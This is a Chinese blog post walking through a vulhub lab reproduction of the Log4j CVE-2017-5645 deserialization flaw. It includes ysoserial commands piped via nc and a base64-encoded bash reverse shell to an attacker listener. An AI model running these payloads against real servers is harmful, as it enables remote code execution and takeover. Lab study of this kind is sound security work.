码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • [ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645


    🍬 博主介绍

    👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
    ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
    🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
    🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
    🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

    文章目录

    • 🍬 博主介绍
    • 一、漏洞编号
    • 二、影响版本
    • 三、漏洞描述
    • 四、环境搭建
      • 1、进入CVE-2017-5645环境
      • 2、启动CVE-2017-5645环境
      • 3、查看CVE-2017-5645环境
      • 4、查看CVE-2017-5645提示信息
      • 5、使用完关闭CVE-2017-5645环境
    • 五、漏洞复现
      • 1、进入容器查看对应文件内容
      • 2、使用ysoserial工具执行创建文件命令
      • 3、进入容器查看对应文件内容
    • 六、Getshell
      • 1、攻击机采用nc进行监听
      • 2、靶机执行连接命令
      • 3、Getshell成功
    • 七、修复建议
    • 八、相关资源

    一、漏洞编号

    CVE-2017-5645
    
    • 1

    二、影响版本

    Apache Log4j 2.8.2之 前的2.x版本
    
    • 1

    三、漏洞描述

    Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

    四、环境搭建

    采用的vulhub的漏洞环境,版本信息:log4j:2.8.1

    1、进入CVE-2017-5645环境

    cd vulhub/log4j/CVE-2017-5645
    
    • 1

    在这里插入图片描述

    2、启动CVE-2017-5645环境

    docker-compose up -d 
    
    • 1

    在这里插入图片描述

    3、查看CVE-2017-5645环境

    docker-compose ps 
    
    • 1

    在这里插入图片描述

    4、查看CVE-2017-5645提示信息

    在这里插入图片描述

    5、使用完关闭CVE-2017-5645环境

    docker-compose down
    
    • 1

    在这里插入图片描述

    五、漏洞复现

    我们这里执行创建文件的命令

    1、进入容器查看对应文件内容

    docker ps
    docker exec -it 04ab443887e4 /bin/bash
    ls /tmp
    
    • 1
    • 2
    • 3

    在这里插入图片描述

    2、使用ysoserial工具执行创建文件命令

    1、准备命令并编码
    首先准备编码好命令,前面好多文章写了,我后续的文章就会写的相对简易一点,就不详细写了
    采用在线工具:

    https://www.loadcaps.com/runtime-exec-payloads/#java-lang-Runtime-exec
    
    • 1

    在这里插入图片描述

    2、工具下载地址
    可以去我的资源里面找,也可以在网上直接下载

    https://download.csdn.net/download/qq_51577576/86514048
    
    • 1

    3、使用ysoserial令靶机执行创建文件命令
    我们使用ysoserial生成payload,然后直接发送给your-ip:4712端口即可。

    java -jar /root/Desktop/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/success" | nc 192.168.13.131 4712
    
    • 1

    在这里插入图片描述

    3、进入容器查看对应文件内容

    发现多了一个success文件,这个文件就是我们之前创建的文件
    说明漏洞确实存在,可以进行恶意攻击

    ls /tmp
    
    • 1

    在这里插入图片描述

    六、Getshell

    1、攻击机采用nc进行监听

    .\nc.exe -lvvp 55555
    
    • 1

    在这里插入图片描述

    2、靶机执行连接命令

    1、准备反弹shell命令并编码
    首先准备编码好的反弹shell命令,前面好多文章写了,我后续的文章就会写的相对简易一点,就不详细写了
    采用在线工具:

    https://www.loadcaps.com/runtime-exec-payloads/#java-lang-Runtime-exec
    
    • 1
    java -jar /root/Desktop/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5Mi4xLzU1NTU1IDA+JjE=}|{base64,-d}|{bash,-i}"| nc 192.168.13.131 4712
    
    • 1

    在这里插入图片描述

    3、Getshell成功

    在这里插入图片描述

    执行ls

    在这里插入图片描述

    七、修复建议

    升级到安全版本

    八、相关资源

    1.ysoserial工具下载地址:

    https://download.csdn.net/download/qq_51577576/86514048
    
    • 1

    2.exec采用在线工具:

    https://www.loadcaps.com/runtime-exec-payloads/#java-lang-Runtime-exec
    
    • 1

    3.Apche log4j远程代码执行漏洞复现一

    https://blog.csdn.net/qq_51577576/article/details/121959727
    
    • 1

    4.Apche log4j远程代码执行漏洞复现二

    https://blog.csdn.net/qq_51577576/article/details/126444582
    
    • 1

    5.docker 搭建 vulhub 靶场环境

    https://blog.csdn.net/qq_51577576/article/details/125048165
    
    • 1

    6.nc反弹shell

    https://blog.csdn.net/qq_51577576/article/details/126128251
    
    • 1

    7.bash反弹shell

    https://blog.csdn.net/qq_51577576/article/details/126651576
    
    • 1

    8.powercat反弹shell

    https://blog.csdn.net/qq_51577576/article/details/126682933
    
    • 1

    9.python反弹shell

    https://blog.csdn.net/qq_51577576/article/details/126693846
    
    • 1
  • 相关阅读:
    HDFS读写流程
    国产小体积超低成本电动车仪表智能刷卡解锁13.56M非接触式读写芯片CI522兼容替代RC522
    为什么工作不能让人满意?
    【操作系统】总结(二)linux指令
    AI 音辨世界:艺术小白的我,靠这个AI模型,速识音乐流派选择音乐 ⛵
    猿创征文|java开发常使用的工具
    Ubuntu Server 20.04 LTS 64bit安装ftp服务
    Java后端面试精选45题
    Java 爬虫 jvppeteer
    PCL点云处理之点云重建为Mesh模型并保存到PLY文件 ---方法二 (二百一十一)
  • 原文地址:https://blog.csdn.net/qq_51577576/article/details/126818310
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号